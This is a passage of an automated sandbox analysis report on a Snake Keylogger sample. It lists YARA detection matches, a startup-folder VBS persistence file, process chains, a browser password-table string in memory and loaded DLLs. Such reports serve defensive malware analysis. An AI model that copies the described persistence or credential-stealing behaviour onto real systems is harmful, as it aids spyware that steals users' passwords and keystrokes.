                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB81B07_2_06BB81B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB81A07_2_06BB81A0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB51987_2_06BB5198
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB518A7_2_06BB518A
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBC9C87_2_06BBC9C8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB79007_2_06BB7900
                      Source: LAQfpnQvPQ.exeStatic PE information: invalid certificate
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.00000000031B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.00000000036B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2243605676.0000000007450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameYxafaye.dll" vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000000.2056233227.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRef#10784512.exeF vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYxafaye.dll" vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.00000000015AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3312271782.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3312735643.0000000000F67000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exeBinary or memory string: OriginalFilenameRef#10784512.exeF vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 6364, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: LAQfpnQvPQ.exe, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: ishon.exe.0.dr, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMutant created: NULL
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
                      Source: LAQfpnQvPQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: LAQfpnQvPQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000315C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3319653378.0000000003FBD000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000316B000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000317A000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3321113680.000000000401C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000320D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: LAQfpnQvPQ.exeReversingLabs: Detection: 55%
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeFile read: C:\Users\user\Desktop\LAQfpnQvPQ.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\LAQfpnQvPQ.exe "C:\Users\user\Desktop\LAQfpnQvPQ.exe"
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess created: C:\Users\user\Desktop\LAQfpnQvPQ.exe "C:\Users\user\Desktop\LAQfpnQvPQ.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess created: C:\Users\user\Desktop\LAQfpnQvPQ.exe "C:\Users\user\Desktop\LAQfpnQvPQ.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
